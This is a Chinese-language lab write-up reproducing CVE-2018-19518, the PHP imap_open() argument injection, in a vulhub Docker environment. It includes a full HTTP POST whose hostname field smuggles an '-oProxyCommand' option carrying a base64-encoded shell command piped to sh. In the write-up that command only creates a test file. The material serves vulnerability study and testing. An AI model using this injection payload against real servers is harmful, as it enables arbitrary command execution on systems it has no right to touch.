详细信息
在PHP和其他产品的imap_open()中使用的UNIX上的华盛顿大学IMAP工具包2007f启动rsh命令(借助于c-client / imap4r1.c中的imap_rimap函数和osdep / unix / tcp_unix中的tcp_aopen函数.c),而不会阻止参数注入,如果IMAP服务器名称是不受信任的输入(例如,由Web应用程序的用户输入),并且rsh已被具有不同参数的程序替换,则远程攻击者可能会执行任意OS命令语义。 例如,如果rsh是ssh的链接(如在Debian和Ubuntu系统上看到的),则攻击可以使用包含“ -oProxyCommand”参数的IMAP服务器名称。
影响范围
PHP 5.6.0版本至5.6.38版本
7.0.0版本至7.0.32版本
7.1.0版本至7.1.24版本
7.2.0版本至7.2.12版本
Debian Linux 8.0版本,9.0版本
复现过程
使用vulhub
cd vulhub/php/CVE-2018-19518
使用docker启动
docker-compose build
docker-compose up -d
环境启动后,访问
127.0.0.1:8080
抓包,修改
POST / HTTP/1.1
Host: **:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Connection: close
Upgrade-Insecure-Requests: 1
hostname=x+-oProxyCommand%3decho%09ZWNobyAnSGVsbG8nPi90bXAvdGVzdA%3d%3d|base64%09-d|sh}&username=111&password=222
其中x+暂时不清楚意义,-oProxyCommand 表示使用该参数。ProxyCommmand相关知识
%09后进行base64编码的内容 如:echo ‘Hello’>/tmp/test
再将部分进行url编码。
进入对应的容器
docker ps -a
docker exec -it ID /bin/bash
cd /tmp
cat test
可见对应的Hello输出说明创建成功。
关闭镜像(每次用完后关闭)
docker-compose down